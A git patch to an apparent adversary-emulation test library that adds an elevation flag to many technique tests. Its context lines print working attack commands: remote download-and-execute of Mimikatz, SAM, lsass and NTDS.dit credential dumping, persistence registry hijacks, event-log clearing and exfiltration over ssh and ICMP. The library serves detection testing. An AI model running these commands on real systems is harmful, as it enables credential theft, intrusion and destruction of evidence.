From 1bfefdacfc25d9893917736dec076a686c72a57f Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Tue, 3 Sep 2019 07:34:42 -0600 Subject: [PATCH] Add elevated (#542) * provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute --- atomics/T1002/T1002.yaml | 5 +++++ atomics/T1003/T1003.yaml | 8 ++++++++ atomics/T1004/T1004.yaml | 3 +++ atomics/T1005/T1005.yaml | 1 + atomics/T1007/T1007.yaml | 2 ++ atomics/T1009/T1009.yaml | 1 + atomics/T1010/T1010.yaml | 1 + atomics/T1012/T1012.yaml | 1 + atomics/T1015/T1015.yaml | 7 +++++++ atomics/T1016/T1016.yaml | 2 ++ atomics/T1018/T1018.yaml | 5 +++++ atomics/T1022/T1022.yaml | 4 ++++ atomics/T1027/T1027.yaml | 1 + atomics/T1028/T1028.yaml | 1 + atomics/T1030/T1030.yaml | 1 + atomics/T1031/T1031.yaml | 1 + atomics/T1033/T1033.yaml | 2 ++ atomics/T1035/T1035.yaml | 1 + atomics/T1036/T1036.yaml | 2 ++ atomics/T1037/T1037.yaml | 1 + atomics/T1040/T1040.yaml | 4 ++++ atomics/T1042/T1042.yaml | 1 + atomics/T1046/T1046.yaml | 1 + atomics/T1047/T1047.yaml | 4 ++++ atomics/T1048/T1048.yaml | 3 +++ atomics/T1049/T1049.yaml | 3 +++ atomics/T1050/T1050.yaml | 2 ++ atomics/T1053/T1053.yaml | 2 ++ atomics/T1055/T1055.yaml | 2 ++ atomics/T1057/T1057.yaml | 1 + atomics/T1063/T1063.yaml | 4 ++++ atomics/T1064/T1064.yaml | 1 + atomics/T1065/T1065.yaml | 2 ++ atomics/T1069/T1069.yaml | 2 ++ atomics/T1070/T1070.yaml | 2 ++ atomics/T1071/T1071.yaml | 4 ++++ atomics/T1074/T1074.yaml | 3 ++- atomics/T1076/T1076.yaml | 1 + atomics/T1077/T1077.yaml | 2 ++ atomics/T1081/T1081.yaml | 2 ++ atomics/T1082/T1082.yaml | 1 + atomics/T1083/T1083.yaml | 2 ++ atomics/T1084/T1084.yaml | 1 + atomics/T1085/T1085.yaml | 1 + atomics/T1086/T1086.yaml | 11 +++++++++++ atomics/T1087/T1087.yaml | 4 ++++ atomics/T1088/T1088.yaml | 2 ++ atomics/T1096/T1096.yaml | 1 + atomics/T1098/T1098.yaml | 1 + atomics/T1099/T1099.yaml | 3 +++ atomics/T1101/T1101.yaml | 1 + atomics/T1103/T1103.yaml | 1 + atomics/T1105/T1105.yaml | 2 ++ atomics/T1107/T1107.yaml | 7 +++++++ atomics/T1110/T1110.yaml | 1 + atomics/T1112/T1112.yaml | 3 +++ atomics/T1113/T1113.yaml | 2 ++ atomics/T1114/T1114.yaml | 1 + atomics/T1115/T1115.yaml | 2 ++ atomics/T1117/T1117.yaml | 3 +++ atomics/T1118/T1118.yaml | 2 ++ atomics/T1119/T1119.yaml | 1 + atomics/T1121/T1121.yaml | 2 ++ atomics/T1123/T1123.yaml | 2 ++ atomics/T1124/T1124.yaml | 2 ++ atomics/T1126/T1126.yaml | 3 +++ atomics/T1127/T1127.yaml | 1 + atomics/T1134/T1134.yaml | 1 + atomics/T1135/T1135.yaml | 2 ++ atomics/T1136/T1136.yaml | 2 ++ atomics/T1138/T1138.yaml | 1 + atomics/T1140/T1140.yaml | 2 ++ atomics/T1141/T1141.yaml | 1 + atomics/T1145/T1145.yaml | 1 + atomics/T1158/T1158.yaml | 8 ++++++-- atomics/T1170/T1170.yaml | 1 + atomics/T1174/T1174.yaml | 1 + atomics/T1179/T1179.yaml | 1 + atomics/T1180/T1180.yaml | 1 + atomics/T1183/T1183.yaml | 2 ++ atomics/T1191/T1191.yaml | 2 ++ atomics/T1193/T1193.yaml | 1 + atomics/T1196/T1196.yaml | 1 + atomics/T1201/T1201.yaml | 2 ++ atomics/T1214/T1214.yaml | 1 + atomics/T1216/T1216.yaml | 1 + atomics/T1218/T1218.yaml | 1 + atomics/T1223/T1223.yaml | 2 ++ atomics/T1485/T1485.yaml | 3 +++ atomics/T1489/T1489.yaml | 3 +++ atomics/T1490/T1490.yaml | 4 ++++ 91 files changed, 201 insertions(+), 3 deletions(-) diff --git a/atomics/T1002/T1002.yaml b/atomics/T1002/T1002.yaml index 619f663c3e..522d5dade1 100644 --- a/atomics/T1002/T1002.yaml +++ b/atomics/T1002/T1002.yaml @@ -19,6 +19,7 @@ atomic_tests: default: C:\test\Data.zip executor: name: powershell + elevation_required: false command: | dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} @@ -38,6 +39,7 @@ atomic_tests: default: exfilthis.rar executor: name: command_prompt + elevation_required: false command: | rar a -r #{output_file} #{input_file} @@ -58,6 +60,7 @@ atomic_tests: default: /tmp/victim-files.zip executor: name: sh + elevation_required: false command: | zip #{output_file} #{input_files} @@ -74,6 +77,7 @@ atomic_tests: default: /tmp/victim-gzip.txt executor: name: sh + elevation_required: false command: | gzip -f #{input_file} @@ -94,5 +98,6 @@ atomic_tests: default: /tmp/victim-files.tar.gz executor: name: sh + elevation_required: false command: | tar -cvzf #{output_file} #{input_file_folder} \ No newline at end of file diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 7ce17c444c..9849d3a390 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -15,6 +15,7 @@ atomic_tests: default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1 executor: name: powershell + elevation_required: true command: | IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds @@ -25,6 +26,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | gsecdump -a @@ -40,6 +42,7 @@ atomic_tests: default: output.txt executor: name: command_prompt + elevation_required: true command: | wce -o #{output_file} @@ -51,6 +54,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | reg save HKLM\sam sam reg save HKLM\system system @@ -68,6 +72,7 @@ atomic_tests: type: Path default: lsass_dump.dmp executor: + elevation_required: true name: command_prompt command: | procdump.exe -accepteula -ma lsass.exe #{output_file} @@ -130,6 +135,7 @@ atomic_tests: default: C:\Atomic_Red_Team executor: name: command_prompt + elevation_required: true command: | ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q @@ -145,6 +151,7 @@ atomic_tests: default: "C:" executor: name: command_prompt + elevation_required: true command: | vssadmin.exe create shadow /for=#{drive_letter} @@ -168,6 +175,7 @@ atomic_tests: default: C:\Extract executor: name: command_prompt + elevation_required: true command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE diff --git a/atomics/T1004/T1004.yaml b/atomics/T1004/T1004.yaml index 63e470e12f..ee1cb90c6b 100644 --- a/atomics/T1004/T1004.yaml +++ b/atomics/T1004/T1004.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force @@ -36,6 +37,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force @@ -54,6 +56,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml index c31e96cd37..2d9e98a9a3 100644 --- a/atomics/T1005/T1005.yaml +++ b/atomics/T1005/T1005.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 11be2a1bbc..766e042c64 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | tasklist.exe sc query @@ -38,5 +39,6 @@ atomic_tests: default: C:\Windows\Temp\service-list.txt executor: name: command_prompt + elevation_required: false command: | net.exe start >> #{output_file} diff --git a/atomics/T1009/T1009.yaml b/atomics/T1009/T1009.yaml index ea09cedc7b..135d5b65d7 100644 --- a/atomics/T1009/T1009.yaml +++ b/atomics/T1009/T1009.yaml @@ -17,5 +17,6 @@ atomic_tests: default: /tmp/evil-binary executor: name: sh + elevation_required: false command: | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} diff --git a/atomics/T1010/T1010.yaml b/atomics/T1010/T1010.yaml index 09c73a6f48..eb188437c0 100644 --- a/atomics/T1010/T1010.yaml +++ b/atomics/T1010/T1010.yaml @@ -22,6 +22,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} #{output_file_name} diff --git a/atomics/T1012/T1012.yaml b/atomics/T1012/T1012.yaml index cb6c5519b0..735cee450d 100644 --- a/atomics/T1012/T1012.yaml +++ b/atomics/T1012/T1012.yaml @@ -23,6 +23,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce diff --git a/atomics/T1015/T1015.yaml b/atomics/T1015/T1015.yaml index e9ef61bb65..b7e9a6b5bd 100644 --- a/atomics/T1015/T1015.yaml +++ b/atomics/T1015/T1015.yaml @@ -17,6 +17,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -34,6 +35,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -51,6 +53,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -68,6 +71,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -85,6 +89,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -102,6 +107,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f @@ -119,5 +125,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index ccc023e767..d9b924891d 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | ipconfig /all netsh interface show @@ -29,6 +30,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | arp -a netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 53b9faba3b..9685af0326 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net view /domain net view @@ -25,6 +26,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i @@ -37,6 +39,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | arp -a @@ -50,6 +53,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | arp -a | grep -v '^?' @@ -63,5 +67,6 @@ atomic_tests: executor: name: sh + elevation_required: false command: | for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done diff --git a/atomics/T1022/T1022.yaml b/atomics/T1022/T1022.yaml index cb4a1673ea..e6599bfdfe 100644 --- a/atomics/T1022/T1022.yaml +++ b/atomics/T1022/T1022.yaml @@ -14,6 +14,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | echo "This file will be encrypted" > /tmp/victim-gpg.txt mkdir /tmp/victim-files @@ -32,6 +33,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | mkdir ./tmp/victim-files cd ./tmp/victim-files @@ -47,6 +49,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | path=%path%;"C:\Program Files (x86)\winzip" mkdir ./tmp/victim-files @@ -62,6 +65,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | mkdir ./tmp/victim-files cd ./tmp/victim-files diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 13087ab7f1..6ac7632de2 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" cat /tmp/encoded.dat | base64 -d > /tmp/art.sh diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 30680d106f..39ce3e5e90 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | Enable-PSRemoting -Force diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 92ddfb6fd1..b5e6cea690 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -15,6 +15,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | cd /tmp/ dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 diff --git a/atomics/T1031/T1031.yaml b/atomics/T1031/T1031.yaml index c2b61952a1..1b647c6e72 100644 --- a/atomics/T1031/T1031.yaml +++ b/atomics/T1031/T1031.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" sc start Fax diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index ce16f6bf4e..c6a6952a2d 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmd.exe /C whoami wmic useraccount get /ALL @@ -38,6 +39,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | users w diff --git a/atomics/T1035/T1035.yaml b/atomics/T1035/T1035.yaml index 301af3422a..e42c32fa5a 100644 --- a/atomics/T1035/T1035.yaml +++ b/atomics/T1035/T1035.yaml @@ -23,6 +23,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | sc.exe create #{service_name} binPath= #{executable_command} sc.exe start #{service_name} diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index 218a4461ad..54e0871845 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe @@ -25,6 +26,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | cp /bin/sh /tmp/crond /tmp/crond diff --git a/atomics/T1037/T1037.yaml b/atomics/T1037/T1037.yaml index 44d5c774f2..b233ba774e 100644 --- a/atomics/T1037/T1037.yaml +++ b/atomics/T1037/T1037.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}" diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index a201c210fc..a08b1d63b4 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -15,6 +15,7 @@ atomic_tests: default: ens33 executor: name: bash + elevation_required: true command: | tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} @@ -31,6 +32,7 @@ atomic_tests: default: en0A executor: name: bash + elevation_required: true command: | tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} @@ -48,6 +50,7 @@ atomic_tests: default: Ethernet0 executor: name: command_prompt + elevation_required: true command: | c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe @@ -65,6 +68,7 @@ atomic_tests: default: Ethernet0 executor: name: powershell + elevation_required: true command: | c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe diff --git a/atomics/T1042/T1042.yaml b/atomics/T1042/T1042.yaml index 2330f9d9f9..def59b5f01 100644 --- a/atomics/T1042/T1042.yaml +++ b/atomics/T1042/T1042.yaml @@ -20,5 +20,6 @@ atomic_tests: default: C:\Program Files\Windows Media Player\wmplayer.exe executor: name: command_prompt + elevation_required: false command: | cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index edae7b327e..38ec1a0abe 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -11,6 +11,7 @@ atomic_tests: - macos executor: name: sh + elevation_required: false command: | for port in {1..65535}; do diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index 067092d37b..2168a481ae 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -10,6 +10,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | wmic useraccount get /ALL - name: WMI Reconnaissance Processes @@ -19,6 +20,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | wmic process get caption,executablepath,commandline - name: WMI Reconnaissance Software @@ -28,6 +30,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | wmic qfe get description,installedOn /format:csv - name: WMI Reconnaissance List Remote Services @@ -47,6 +50,7 @@ atomic_tests: default: sql server executor: name: command_prompt + elevation_required: false command: | wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index cecbbb9038..ca0e8c2c55 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -31,6 +31,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz @@ -62,6 +63,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' @@ -111,5 +113,6 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index e57adc8046..c9eb674918 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | netstat net use @@ -26,6 +27,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Get-NetTCPConnection @@ -39,6 +41,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | netstat who -a diff --git a/atomics/T1050/T1050.yaml b/atomics/T1050/T1050.yaml index bd6dde4693..e5e5349436 100644 --- a/atomics/T1050/T1050.yaml +++ b/atomics/T1050/T1050.yaml @@ -20,6 +20,7 @@ atomic_tests: default: AtomicTestService executor: name: command_prompt + elevation_required: true command: | sc.exe create #{service_name} binPath= #{binary_path} sc.exe start #{service_name} @@ -44,6 +45,7 @@ atomic_tests: default: AtomicTestService executor: name: powershell + elevation_required: true command: | New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" Start-Service -Name "#{service_name}" diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml index e81a4c38b3..d29ec7172f 100644 --- a/atomics/T1053/T1053.yaml +++ b/atomics/T1053/T1053.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | at 13:20 /interactive cmd - name: Scheduled task Local @@ -33,6 +34,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index c7267e4300..6a7878ae88 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -21,6 +21,7 @@ atomic_tests: default: $pid executor: name: powershell + elevation_required: true command: | mavinject $pid /INJECTRUNNING #{dll_payload} @@ -42,6 +43,7 @@ atomic_tests: default: $pid executor: name: powershell + elevation_required: true command: | Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload} diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index df52668394..5c25ead5fc 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml @@ -21,6 +21,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | ps >> #{output_file} ps aux >> #{output_file} diff --git a/atomics/T1063/T1063.yaml b/atomics/T1063/T1063.yaml index e68763dfb9..28bde8e581 100644 --- a/atomics/T1063/T1063.yaml +++ b/atomics/T1063/T1063.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | netsh.exe advfirewall firewall show all profiles tasklist.exe @@ -29,6 +30,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | get-process | ?{$_.Description -like "*virus*"} get-process | ?{$_.Description -like "*carbonblack*"} @@ -45,6 +47,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService @@ -58,5 +61,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | fltmc.exe | findstr.exe 385201 \ No newline at end of file diff --git a/atomics/T1064/T1064.yaml b/atomics/T1064/T1064.yaml index 403c69ff09..739ee3e3e1 100644 --- a/atomics/T1064/T1064.yaml +++ b/atomics/T1064/T1064.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: sh + elevation_required: false command: | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" diff --git a/atomics/T1065/T1065.yaml b/atomics/T1065/T1065.yaml index 41bc197411..8d5d0d9f0c 100644 --- a/atomics/T1065/T1065.yaml +++ b/atomics/T1065/T1065.yaml @@ -22,6 +22,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | test-netconnection -ComputerName #{domain} -port #{port} @@ -45,5 +46,6 @@ atomic_tests: executor: name: sh + elevation_required: false command: | telnet #{domain} #{port} diff --git a/atomics/T1069/T1069.yaml b/atomics/T1069/T1069.yaml index 3d45d14a97..1a862a2329 100644 --- a/atomics/T1069/T1069.yaml +++ b/atomics/T1069/T1069.yaml @@ -27,6 +27,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net localgroup net group /domain @@ -46,6 +47,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | get-localgroup get-ADPrinicipalGroupMembership #{user} | select name diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml index 3affd9e123..12d6de8223 100644 --- a/atomics/T1070/T1070.yaml +++ b/atomics/T1070/T1070.yaml @@ -15,6 +15,7 @@ atomic_tests: default: System executor: name: command_prompt + elevation_required: true command: | wevtutil cl #{log_name} @@ -25,6 +26,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | fsutil usn deletejournal /D C: diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml index 3c35317d5e..fa3ed6e5f7 100644 --- a/atomics/T1071/T1071.yaml +++ b/atomics/T1071/T1071.yaml @@ -17,6 +17,7 @@ atomic_tests: default: www.google.com executor: name: powershell + elevation_required: false command: | Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null @@ -70,6 +71,7 @@ atomic_tests: default: 1000 executor: name: powershell + elevation_required: false command: | for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} @@ -107,6 +109,7 @@ atomic_tests: default: 30 executor: name: powershell + elevation_required: false command: | .\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} @@ -132,5 +135,6 @@ atomic_tests: default: TXT executor: name: powershell + elevation_required: false command: | .\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} \ No newline at end of file diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index 86173a5089..23c477922d 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml @@ -12,8 +12,9 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | - "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat') > pi.log - name: Stage data from Discovery.sh description: | diff --git a/atomics/T1076/T1076.yaml b/atomics/T1076/T1076.yaml index 92c460b716..365c0a9761 100644 --- a/atomics/T1076/T1076.yaml +++ b/atomics/T1076/T1076.yaml @@ -13,6 +13,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" diff --git a/atomics/T1077/T1077.yaml b/atomics/T1077/T1077.yaml index 1fcac5742c..d0aa110e2d 100644 --- a/atomics/T1077/T1077.yaml +++ b/atomics/T1077/T1077.yaml @@ -29,6 +29,7 @@ atomic_tests: default: Target executor: name: command_prompt + elevation_required: false command: | cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" @@ -52,5 +53,6 @@ atomic_tests: default: g executor: name: powershell + elevation_required: false command: | New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} diff --git a/atomics/T1081/T1081.yaml b/atomics/T1081/T1081.yaml index b96cd2dd10..39ec18d413 100644 --- a/atomics/T1081/T1081.yaml +++ b/atomics/T1081/T1081.yaml @@ -38,6 +38,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: true command: | invoke-mimikittenz mimikatz.exe @@ -49,6 +50,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | findstr /si pass *.xml | *.doc | *.txt | *.xls ls -R | select-string -Pattern password diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index f5d6a8ee54..fbe6d766ef 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index ed152e5f52..88b64457a3 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download @@ -31,6 +32,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | ls -recurse get-childitem -recurse diff --git a/atomics/T1084/T1084.yaml b/atomics/T1084/T1084.yaml index 0b24f0fcbe..48ee0d3c27 100644 --- a/atomics/T1084/T1084.yaml +++ b/atomics/T1084/T1084.yaml @@ -20,6 +20,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; diff --git 